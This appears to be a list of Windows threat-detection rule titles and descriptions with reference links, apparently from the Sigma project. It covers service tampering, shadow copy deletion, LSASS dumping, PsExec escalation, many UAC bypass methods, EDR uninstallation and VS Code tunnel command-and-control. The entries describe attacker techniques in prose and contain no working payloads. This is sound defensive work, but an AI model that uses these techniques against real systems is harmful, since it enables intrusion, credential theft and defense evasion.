Suspicious New Service Creation Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
Suspicious Service Binary Directory Detects a service binary running in a suspicious directory https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
Shadow Copies Creation Using Operating Systems Utilities Shadow Copies creation using operating systems utilities, possible credential access https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/
Suspicious Windows Service Tampering Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg, https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
System File Execution Location Anomaly Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location. https://twitter.com/GelosSnake/status/934900723426439170, https://asec.ahnlab.com/en/39828/
Shadow Copies Deletion Using Operating Systems Utilities Shadow Copies deletion using operating systems utilities https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://blog.talosintelligence.com/2017/05/wannacry.html, https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/, https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/, https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100, https://github.com/Neo23x0/Raccine#the-process, https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar, https://redcanary.com/blog/intelligence-insights-october-2021/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware
Windows Shell/Scripting Processes Spawning Suspicious Programs Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc. https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
Suspicious SYSTEM User Process Creation Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) Internal Research, https://tools.thehacker.recipes/mimikatz/modules
Suspicious SYSVOL Domain Group Policy Access Detects Access to Domain Group Policies stored in SYSVOL https://adsecurity.org/?p=2288, https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100
Tasks Folder Evasion The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr https://twitter.com/subTee/status/1216465628946563073, https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26
Process Creation Using Sysnative Folder Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
Suspicious Userinit Child Process Detects a suspicious child process of userinit https://twitter.com/SBousseaden/status/1139811587760562176
Malicious Windows Script Components File Execution by TAEF Detection Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/, https://twitter.com/pabraeken/status/993298228840992768, https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/
Malicious PE Execution by Microsoft Visual Studio Debugger There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package. https://twitter.com/pabraeken/status/990758590020452353, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/, https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019
Weak or Abused Passwords In CLI Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments, https://thedfirreport.com/2022/09/26/bumblebee-round-two/, https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
Usage Of Web Request Commands And Cmdlets Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/, https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell, https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
WhoAmI as Parameter Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) https://twitter.com/blackarrowsec/status/1463805700602224645?s=12
Execution via WorkFolders.exe Detects using WorkFolders.exe to execute an arbitrary control.exe https://twitter.com/elliotkillick/status/1449812843772227588
Suspect Svchost Activity It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2
Suspicious Process Masquerading As SvcHost.EXE Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection. https://tria.ge/240731-jh4crsycnb/behavioral2, https://redcanary.com/blog/threat-detection/process-masquerading/
Terminal Service Process Spawn Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/
Uncommon Svchost Parent Process Detects an uncommon svchost parent process Internal Research
Permission Check Via Accesschk.EXE Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43, https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW, https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat, https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat
Active Directory Database Snapshot Via ADExplorer Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
Suspicious Active Directory Database Snapshot Via ADExplorer Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
Potential Execution of Sysinternals Tools Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools https://twitter.com/Moti_B/status/1008587936735035392
Potential Memory Dumping Activity Via LiveKD Detects execution of LiveKD based on PE metadata or image name https://learn.microsoft.com/en-us/sysinternals/downloads/livekd
Kernel Memory Dump Via LiveKD Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory https://learn.microsoft.com/en-us/sysinternals/downloads/livekd, https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/, https://kb.acronis.com/content/60892
Procdump Execution Detects usage of the SysInternals Procdump utility https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
Potential SysInternals ProcDump Evasion Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name https://twitter.com/mrd0x/status/1480785527901204481
Potential LSASS Process Dump Via Procdump Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable. https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
Psexec Execution Detects user accept agreement execution in psexec commandline https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
PsExec/PAExec Escalation to LOCAL SYSTEM Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
Potential PsExec Remote Execution Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
PsExec Service Child Process Execution as LOCAL SYSTEM Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
PsExec Service Execution Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.youtube.com/watch?v=ro2QuZTIMBM
Suspicious Use of PsLogList Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/, https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos, https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList, https://twitter.com/EricaZelic/status/1614075109827874817
Sysinternals PsService Execution Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering https://learn.microsoft.com/en-us/sysinternals/downloads/psservice
Sysinternals PsSuspend Execution Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend, https://twitter.com/0gtweet/status/1638069413717975046
Sysinternals PsSuspend Suspicious Execution Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend, https://twitter.com/0gtweet/status/1638069413717975046
Potential File Overwrite Via Sysinternals SDelete Detects the use of SDelete to erase a file not the free space https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
Potential Privilege Escalation To LOCAL SYSTEM Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
Sysmon Configuration Update Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Uninstall Sysinternals Sysmon Detects the removal of Sysmon, which could be a potential attempt at defense evasion https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon
Potential Binary Impersonating Sysinternals Tools Detects binaries that use the same name as legitimate sysinternals tools to evade detection https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
Sysprep on AppData Folder Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets, https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b
Suspicious Execution of Systeminfo Detects usage of the "systeminfo" command to retrieve information https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo
Potential Signing Bypass Via Windows Developer Features Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
Suspicious Recursive Takeown Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility
Tap Installer Execution Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers
Compressed File Creation Via Tar.EXE Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. https://unit42.paloaltonetworks.com/chromeloader-malware/, https://lolbas-project.github.io/lolbas/Binaries/Tar/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
Compressed File Extraction Via Tar.EXE Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection. https://unit42.paloaltonetworks.com/chromeloader-malware/, https://lolbas-project.github.io/lolbas/Binaries/Tar/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
Taskkill Symantec Endpoint Protection Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. https://www.exploit-db.com/exploits/37525, https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection, https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer
Loaded Module Enumeration Via Tasklist.EXE Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. In order to dump the process memory or perform other nefarious actions. https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/, https://pentestlab.blog/tag/svchost/
Taskmgr as LOCAL_SYSTEM Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM Internal Research
New Process Created Via Taskmgr.EXE Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC https://twitter.com/ReneFreingruber/status/1172244989335810049
Potentially Suspicious Command Targeting Teams Sensitive Files Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts. https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
Suspicious TSCON Start as SYSTEM Detects a tscon.exe start as LOCAL SYSTEM http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html, https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6, https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement
New Virtual Smart Card Created Via TpmVscMgr.EXE Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card. https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr
Bypass UAC via CMSTP Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md, https://lolbas-project.github.io/lolbas/Binaries/Cmstp/
Suspicious RDP Redirect Using TSCON Detects a suspicious RDP session redirect using tscon.exe http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html, https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6, https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/
UAC Bypass Using Disk Cleanup Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) https://github.com/hfiref0x/UACME
UAC Bypass Using ChangePK and SLUI Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61) https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b, https://github.com/hfiref0x/UACME, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
CMSTP UAC Bypass via COM Object Access Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/, https://twitter.com/hFireF0X/status/897640081053364225, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf, https://github.com/hfiref0x/UACME
UAC Bypass Tools Using ComputerDefaults Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) https://github.com/hfiref0x/UACME
Potential RDP Session Hijacking Activity Detects potential RDP Session Hijacking activity on Windows systems https://twitter.com/Moti_B/status/909449115477659651
UAC Bypass Using Consent and Comctl32 - Process Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) https://github.com/hfiref0x/UACME
UAC Bypass Using DismHost Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) https://github.com/hfiref0x/UACME
Bypass UAC via Fodhelper.exe Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md
UAC Bypass Using Event Viewer RecentViews Detects the pattern of UAC Bypass using Event Viewer RecentViews https://twitter.com/orange_8361/status/1518970259868626944, https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute
UAC Bypass Using NTFS Reparse Point - Process Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) https://github.com/hfiref0x/UACME
UAC Bypass via ICMLuaUtil Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html
UAC Bypass Using IDiagnostic Profile Detects the "IDiagnosticProfileUAC" UAC bypass technique https://github.com/Wh04m1001/IDiagnosticProfileUAC
UAC Bypass Using IEInstal - Process Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) https://github.com/hfiref0x/UACME
UAC Bypass via Windows Firewall Snap-In Hijack Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack
UAC Bypass Using MSConfig Token Modification - Process Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) https://github.com/hfiref0x/UACME
UAC Bypass Using PkgMgr and DISM Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) https://github.com/hfiref0x/UACME
Potential UAC Bypass Via Sdclt.EXE A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. https://github.com/OTRF/detection-hackathon-apt29/issues/6, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
TrustedPath UAC Bypass Pattern Detects indicators of a UAC bypass method by mocking directories https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e, https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows, https://github.com/netero1010/TrustedPath-UACBypass-BOF
UAC Bypass Abusing Winsat Path Parsing - Process Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) https://github.com/hfiref0x/UACME
UAC Bypass Using Windows Media Player - Process Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) https://github.com/hfiref0x/UACME
Bypass UAC via WSReset.exe Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html, https://lolbas-project.github.io/lolbas/Binaries/Wsreset/, https://www.activecyber.us/activelabs/windows-uac-bypass, https://twitter.com/ReaQta/status/1222548288731217921
UAC Bypass WSReset Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config https://lolbas-project.github.io/lolbas/Binaries/Wsreset/, https://github.com/hfiref0x/UACME, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
Use of UltraVNC Remote Access Software An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md
Suspicious UltraVNC Execution Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine, https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution, https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html
Uninstall Crowdstrike Falcon Sensor Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Windows Credential Manager Access via VaultCmd List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd
Uncommon Userinit Child Process Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html, https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core
Verclsid.exe Runs COM Object Detects when verclsid.exe is used to run COM object via GUID https://lolbas-project.github.io/lolbas/Binaries/Verclsid/, https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5, https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
Detect Virtualbox Driver Installation OR Starting Of VMs Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/, https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/
Suspicious VBoxDrvInst.exe Parameters Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml, https://twitter.com/pabraeken/status/993497996179492864
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/, https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/
Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/
VMToolsd Suspicious Child Process Detects suspicious child process creations of VMware Tools process which may indicate persistence setup https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/, https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png, https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf
Potentially Suspicious Child Process Of VsCode Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. https://twitter.com/nas_bench/status/1618021838407495681, https://twitter.com/nas_bench/status/1618021415852335105
Visual Studio Code Tunnel Execution Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels
Visual Studio Code Tunnel Shell Execution Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels
Renamed Visual Studio Code Tunnel Execution Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels
Visual Studio Code Tunnel Service Installation Detects the installation of VsCode tunnel (code-tunnel) as a service. https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels
Potential Binary Proxy Execution Via VSDiagnostics.EXE Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. https://twitter.com/0xBoku/status/1679200664013135872
Suspicious Vsls-Agent Command With AgentExtensionPath Load Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter https://twitter.com/bohops/status/1583916360404729857
Use of W32tm as Timer When configured with suitable command line arguments, w32tm can act as a delay mechanism https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md, https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains
Wab Execution From Non Default Location Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime, https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Wab/Wabmig Unusual Parent Or Child Processes Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime, https://thedfirreport.com/2022/09/26/bumblebee-round-two/
